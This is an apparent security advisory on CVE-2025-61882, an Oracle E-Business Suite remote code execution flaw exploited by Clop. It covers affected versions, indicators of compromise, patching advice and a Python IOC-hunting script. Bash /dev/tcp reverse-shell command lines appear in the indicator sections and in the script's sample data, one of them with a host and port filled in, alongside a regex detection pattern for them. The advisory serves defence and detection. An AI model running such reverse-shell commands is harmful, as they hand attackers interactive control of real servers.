Oracle E-Business Suite Zero-Day Exploited in Clop Data Theft Attacks (CVE-2025-61882)
October 6th, 2025
Critical

Our Cyber Threat Intelligence Unit is monitoring active exploitation of a critical, unauthenticated remote code execution vulnerability in Oracle E-Business Suite (EBS), tracked as CVE-2025-61882. The vulnerability resides in the BI Publisher Integration component of Oracle Concurrent Processing and carries a CVSS v3.1 base score of 9.8 (Critical): it is reachable over the network without credentials or user interaction and is straightforward to exploit. Oracle issued an emergency Security Alert on October 4, 2025, confirming that EBS versions 12.2.3 through 12.2.14 are affected. The October 2023 Critical Patch Update must be installed before the emergency fix can be applied. Incident responders at Mandiant and Google Threat Intelligence Group attribute the activity to the Clop extortion group, which used this zero-day in a data-theft campaign against enterprise resource planning (ERP) environments that began in August 2025.
Technical Details
CVE ID: CVE-2025-61882
Severity: Critical (CVSS v3.1 base score 9.8).
Affected Versions: EBS 12.2.3 – 12.2.14.
Attack Type: Unauthenticated remote code execution in Oracle E-Business Suite Concurrent Processing (BI Publisher Integration).
Exploit Method: Attackers send crafted HTTP requests to the vulnerable component and obtain arbitrary OS command execution on the EBS application tier. Observed activity includes spawning reverse shells and interactive sessions.
Exploit Artifacts: A publicly leaked archive contains a readme and two Python scripts (exp.py and server.py) that trigger the flaw and return a shell to the attacker. Oracle listed the archive and scripts by SHA-256 hash as indicators of compromise (IOCs); see the table below.
Delivery Vector: Unauthenticated HTTP requests to EBS BI Publisher Integration interfaces exposed to the internet.
Technique: Remote execution of arbitrary OS commands resulting in attacker-controlled shells, file exfiltration, and post-exploitation extortion. The published command indicator is sh -c /bin/bash -i >& /dev/tcp// 0>&1; the attacker host and port that would normally sit between the slashes of the /dev/tcp/ path are absent from it, so detections should match the /dev/tcp/ reverse-shell idiom with any host and port rather than only this exact string.
Patch Note: Oracle's emergency update for CVE-2025-61882 requires the October 2023 Critical Patch Update (CPU) to be installed first.

Impact
Critical Remote RCE Exposure: Allows unauthenticated attackers to gain complete control of EBS application servers.
Operational Impact: Observed reverse-shell activity (sh -c /bin/bash -i >& /dev/tcp// 0>&1) enables interactive control for data exfiltration and lateral movement.
Exploitation Scale: A public exploit archive and widespread internet-facing EBS instances increase the risk of mass exploitation and copycat campaigns.
Business Consequence: Compromise may lead to theft of financial, HR, and supply-chain records, followed by Clop-style extortion emails threatening public leak of stolen data.
Detection Method
Network & Application Indicators:
Monitor for suspicious HTTP GET/POST requests to EBS endpoints originating from:
200[.]107[.]207[.]26
185[.]181[.]60[.]11
Review web-tier access logs for requests to BI Publisher Integration or Concurrent Processing URLs from unexpected external sources. Because the flaw is pre-authentication, malicious requests carry no valid EBS session, so do not rely on authentication failures to surface them; look instead at source addresses, request volume, and responses that precede unexpected process activity on the application tier.
Host & Process Indicators:
Detect command lines indicative of reverse shell invocation, for example:
sh -c /bin/bash -i >& /dev/tcp// 0>&1
The published indicator has the host and port stripped from the /dev/tcp/ path; match on the /dev/tcp/ idiom with any host and port so that live variants are caught.
Flag unexpected EBS processes spawning Python interpreters, shell sessions, or outbound network connections.
Hunt for large archive creation events or unusual file reads performed by EBS process owners.
Incident Response Indicators:
Correlate technical findings with receipt of Clop-style extortion emails claiming EBS data theft.
If present, treat as a high-priority security incident and preserve forensic evidence for IR analysis.
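The detection logic above, run over constructed sample access-log lines, process command lines and file contents. This is an added example, not tooling from the original advisory, Oracle or Mandiant. The attacker IPs, file hashes and command indicator are the published IOCs; the log lines, request paths (placeholders, not real EBS endpoints), timestamps and file contents are constructed. The reverse-shell regex deliberately accepts any host and port in the /dev/tcp/ path, because the published command string has them stripped.

```python
"""IOC hunt for CVE-2025-61882 activity.

Added example; not Oracle's, Mandiant's or the advisory's own tooling.
Sample access-log lines, command lines and file contents are constructed;
request paths are placeholders. Indicator IPs, hashes and the command
pattern come from the published IOCs.
"""
import hashlib
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

IOC_IPS = {"200.107.207.26", "185.181.60.11"}
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b",
}

# The published command IOC, "sh -c /bin/bash -i >& /dev/tcp// 0>&1", has the
# attacker host and port stripped from the /dev/tcp/ path. Match the bash
# reverse-shell idiom with any (or no) host and port so a live variant such as
# "/bin/bash -i >& /dev/tcp/203.0.113.5/4444 0>&1" is caught as well.
REVERSE_SHELL_RE = re.compile(
    r"(?:/bin/)?(?:ba)?sh\s+-i\s*>&\s*/dev/tcp/[^/\s]*/\S*\s*0>&1"
)

# Apache-style combined log format (client IP, timestamp, request line, status, size).
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)


@dataclass(frozen=True)
class Hit:
    kind: str       # "ioc_ip", "reverse_shell" or "ioc_hash"
    evidence: str   # the matched indicator
    source: str     # the log line, command line or file path it came from


def scan_access_log(lines: Iterable[str]) -> List[Hit]:
    """Flag requests from the published attacker IPs; unparseable lines are skipped."""
    hits = []
    for line in lines:
        m = ACCESS_LOG_RE.match(line)
        if m and m.group("ip") in IOC_IPS:
            hits.append(Hit("ioc_ip", m.group("ip"), line))
    return hits


def scan_command_lines(cmds: Iterable[str]) -> List[Hit]:
    """Flag process command lines (from auditd, EDR, etc.) that open a /dev/tcp reverse shell."""
    hits = []
    for cmd in cmds:
        m = REVERSE_SHELL_RE.search(cmd)
        if m:
            hits.append(Hit("reverse_shell", m.group(0), cmd))
    return hits


def scan_file_hashes(files: Dict[str, bytes]) -> List[Hit]:
    """Compare the SHA-256 of file contents (path -> bytes, read from disk in practice) to the IOC hashes."""
    hits = []
    for path, data in files.items():
        digest = hashlib.sha256(data).hexdigest()
        if digest in IOC_SHA256:
            hits.append(Hit("ioc_hash", digest, path))
    return hits


# Constructed sample data. Paths are placeholders, not real EBS endpoints.
SAMPLE_ACCESS_LOG = [
    '10.20.30.40 - - [09/Aug/2025:03:14:01 +0000] "GET /placeholder/home HTTP/1.1" 200 1834',
    '200.107.207.26 - - [09/Aug/2025:03:14:07 +0000] "POST /placeholder/endpoint HTTP/1.1" 200 512',
    '185.181.60.11 - - [09/Aug/2025:03:15:22 +0000] "GET /placeholder/endpoint HTTP/1.1" 200 77',
    "not a log line",
]
SAMPLE_COMMANDS = [
    "sh -c /bin/bash -i >& /dev/tcp// 0>&1",            # published (stripped) form
    "/bin/bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",   # constructed live variant
    "bash -c 'ls /dev/tcp'",                            # benign: mentions /dev/tcp only
    "java -jar placeholder.jar",                        # benign
]
SAMPLE_FILES = {"/tmp/exp.py": b"print('constructed benign content')"}  # name alone is not an IOC


def hunt() -> List[Hit]:
    """Run all three scans over the sample data and return every hit."""
    return (scan_access_log(SAMPLE_ACCESS_LOG)
            + scan_command_lines(SAMPLE_COMMANDS)
            + scan_file_hashes(SAMPLE_FILES))


if __name__ == "__main__":
    for h in hunt():
        print(f"[{h.kind}] {h.evidence}  <- {h.source}")
```

In the sample data the two attacker IPs and both reverse-shell forms are flagged, while the benign command that merely mentions /dev/tcp and the file named exp.py with non-matching content are not: the filename is only a hint, the hash is the indicator. In production, feed the functions real access logs, process-creation telemetry and the bytes of suspect files on the EBS application tier.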
Indicators of Compromise
| Type | Indicator |
|---|---|
| File Hash (SHA-256) | 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d |
| File Hash (SHA-256) | aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 |
| File Hash (SHA-256) | 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b |
| Command Line | sh -c /bin/bash -i >& /dev/tcp// 0>&1 |
| IP Address | 200[.]107[.]207[.]26 |
| IP Address | 185[.]181[.]60[.]11 |

Recommendations
Apply Oracle’s emergency security update for CVE-2025-61882 immediately.
Confirm the October 2023 Critical Patch Update is installed beforehand.
Restrict access to EBS web interfaces and BI Publisher components to internal networks or VPNs; block direct internet exposure.
Enforce least-privilege principles for EBS administrative and service accounts; enable MFA for privileged logins.
Continuously monitor logs and endpoint telemetry for IOC matches and abnormal process activity.
If exploitation is suspected:
Isolate affected systems from the network.
Preserve logs and evidence for forensic investigation.
Rotate credentials and API keys associated with the EBS environment.
Notify legal and communications teams if extortion communications are received.
Conclusion
CVE-2025-61882 is a critical, unauthenticated remote code execution vulnerability that poses an immediate and severe threat to organizations running Oracle E-Business Suite 12.2.3 – 12.2.14. Its unauthenticated attack surface, public exploit availability, and confirmed use by Clop operators make rapid patch deployment imperative. We urge organizations to apply Oracle’s emergency update (with October 2023 Critical Patch Update prerequisite), hunt for the listed IOCs, and prepare incident-response plans for potential extortion scenarios linked to data theft.